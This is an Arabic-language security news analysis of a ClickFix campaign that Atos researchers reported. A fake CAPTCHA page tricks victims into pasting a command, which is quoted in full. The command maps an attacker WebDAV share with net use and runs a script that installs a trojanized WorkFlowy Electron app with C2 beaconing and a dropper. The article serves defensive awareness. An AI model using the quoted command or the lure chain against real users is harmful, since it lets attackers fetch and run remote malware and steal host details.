في تطور مقلق للتهديدات السيبرانية، كشف باحثون في شركة “Atos” عن متغير جديد ومتطور لتقنية الاختراق المعروفة باسم “ClickFix”. تتميز هذه النسخة بتعقيد أسلوبها في التسلل والتهرب من أنظمة الحماية، حيث تعتمد على خداع المستخدم لتنفيذ أوامر ضارة بنفسه باستخدام أوامر شبكية مشروعة، ومن ثم تسليم حمولتها الخبيثة عبر تطبيق سطح مكتب شرعي معدل.
يأتي هذا التقرير ليلقي الضوء على آليات هذا الهجوم الجديد، ويحلل طريقة عمله، ويكشف عن الأهداف التي يسعى إليها المهاجمون، وذلك بهدف تعزيز الوعي الأمني ودعم قدرات الدفاع السيبراني للمؤسسات والأفراد على حد سواء.
آلية الهجوم: من صفحة خادعة إلى اختراق كامل
يبدأ الهجوم، كالعادة في هجمات ClickFix، بصفحة ويب خادعة. في هذه الحملة، استخدم المهاجمون موقعاً إلكترونياً يحمل اسماً براقاً “happyglamper[.]ro” (سعيد ومبتهج)، ولكنه كان يخفي شراً مستطيراً. تظهر للزائر صفحة تطلب منه التحقق من هويته عبر ما يشبه اختبار “أنا لست برنامج آلي” (CAPTCHA)، ولكن بطريقة غير مألوفة.
تطلب التعليمات المزيفة من الضحية الضغط على اختصار لوحة المفاتيح “Win + R” لفتح نافذة “تشغيل” (Run)، ثم الضغط على “Ctrl + V” للصق أمر ما، وأخيراً الضغط على “Enter”. ما يحدث في الخلفية هو أن الصفحة الخبيثة تنسخ أمراً ضاراً إلى حافظة المستخدم (Clipboard) دون علمه، ليقوم هو بلصقه وتنفيذه بيديه.
الأمر الذي يتم تنفيذه هو:
`cmd.exe” /c net use Z: https://94.156.170[.]255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /delete`
هذا الأمر يمثل نقلة نوعية في تقنية ClickFix. فبدلاً من استخدام أدوات مألوفة وسهلة الرصد مثل PowerShell أو MSHTA، استخدم المهاجمون أمراً شبكياً تقليدياً هو “net use”. هذا الأمر يقوم بإنشاء اتصال مؤقت بمجلد مشارك (WebDAV) على خادم خارجي يسيطر عليه المهاجم، ويتم تعيينه كمحرك أقراص شبكي (Z:) على جهاز الضحية. بعد ذلك، يتم تنفيذ ملف Script يحمل اسم “update.cmd” من هذا المحرك، ثم يتم حذف الاتصال فوراً. هذه الخطوة تجعل الهجوم أقل وضوحاً لأنشطة المراقبة التي تركز على استخدام أدوات Scripting الواضحة.
تحليل الحمولة: تحميل وتشغيل تطبيق “WorkFlowy” المعدل
عند تشغيل ملف “update.cmd”، يقوم بدوره بتشغيل واجهة أوامر PowerShell جديدة بشكل مخفي. هذه الواجهة تقوم بالمهام التالية:
1. تحميل ملف مضغوط: تقوم بتحميل أرشيف برابط مباشر من الخادم نفسه `https://94.156.170[.]255/flowy.zip` وحفظه في مجلد الملفات المؤقتة للنظام (`%TEMP%`).
2. فك الضغط: تقوم بفك محتويات هذا الأرشيف إلى مجلد جديد داخل ملفات البرامج المحلية (`%LOCALAPPDATA%\MyApp`).
3. التشغيل: بعد الانتهاء، تقوم بتشغيل ملف التنفيذ الرئيسي من داخل المجلد الذي تم فكه، وهو “WorkFlowy.exe”.
هنا يكمن الجزء الأكثر دهاءً في هذه الحملة. حيث أن الملف الذي تم فكه ليس برنامجاً ضاراً بحد ذاته، بل هو نسخة قديمة وشرعية تماماً من تطبيق “WorkFlowy” الشهير لتدوين الملاحظات، موقعة من قبل المطور الرسمي “FunRoutine Inc.”، ولكنه معدل.
تحليل تطبيق WorkFlowy المعدل: إخفاء الشيفرة داخل تطبيق Electron
تطبيق WorkFlowy هو تطبيق سطح مكتب مبني على إطار العمل “Electron”، والذي يعتمد على تقنيات الويب (HTML, CSS, JavaScript) ويستخدم أرشيفات خاصة تحمل الامتداد “.asar” لتعبئة الكود المصدري. استغل المهاجمون هذه البنية ببراعة.
قاموا باستبدال ملف “app.asar” الأصلي داخل مجلد موارد التطبيق بآخر معدل. عند تشغيل التطبيق الشرعي، يقوم بقراءة الكود من هذا الملف. الكود الجديد يحتوي على شيفرات ضارة مكتوبة بلغة JavaScript ومخفية بشكل كبير داخل ملف `main.js`، وهو نقطة الدخول الرئيسية للتطبيق.
الوظائف الخبيثة داخل التطبيق
1. التهرب من الرصد: الشيفرة الضارة تُصمم بحيث يتم تنفيذها أولاً قبل بدء تشغيل التطبيق الأصلي. يتم ذلك عبر استخدام دالة لا نهائية تمنع التطبيق الأصلي من العمل بشكل طبيعي، مما يخفي النشاط الضار عن المستخدم الذي قد ينتظر فتح البرنامج.
2. بصمة فريدة للضحية (Fingerprinting): عند التشغيل الأول، يقوم البرنامج بإنشاء معرف فريد مكون من 8 أحرف وأرقام ويحفظه في ملف `id.txt` داخل مجلد `%APPDATA%`. في كل مرة يُعاد تشغيل البرنامج، يتم قراءة هذا المعرف لربط الجلسات المختلفة بنفس الضحية.
3. الاتصال بخادم القيادة والتحكم (C2 Beaconing): يبدأ البرنامج الضار بحلقة لا نهائية تتصل كل ثانيتين بخادم المهاجمين على النطاق `cloudflare[.]report`. يتم إرسال بيانات الضحية (المعرف الفريد، اسم الجهاز، واسم مستخدم Windows) في طلب HTTP POST.
4. تنزيل وتنفيذ الحمولة النهائية (Dropper): يستمع البرنامج للتعليمات من خادم C2. إذا تلقى أمراً بذلك، فإنه يقوم بفك تشفير محتوى ملف مشفر (Base64) يتم إرساله، وحفظه في مجلد مؤقت تحت `%TEMP%`، ومن ثم تنفيذ أي ملف `.exe` موجود فيه. هذا يعني أن الحمولة النهائية للهجوم (مثل برامج الفدية أو برامج التجسس) يمكن تسليمها لاحقاً.
نقاط القوة في الهجوم من وجهة نظر المهاجم
– التهرب من برامج الحماية: لم يتمكن “Microsoft Defender for Endpoint” من رصد هذه السلسلة الهجومية. المراوغة بدأت باستخدام “net use” بدلاً من PowerShell المباشر، وانتهت بتشغيل كود ضار داخل عملية برنامج شرعي وموقع، مما يجعل التحليل السلوكي القائم على العمليات أكثر صعوبة.
– صعوبة فحص الحمولة: أرشيفات `.asar` نادراً ما يتم فحصها بواسطة برامج مكافحة الفيروسات، مما سمح بإخفاء الشيفرة الضارة بسهولة.
– الاعتماد على الثقة: المستخدم يقوم بتنفيذ الخطوات الأولى بنفسه، والبرنامج الذي يتم تشغيله هو برنامج معروف وموقّع، مما يقلل الشكوك.
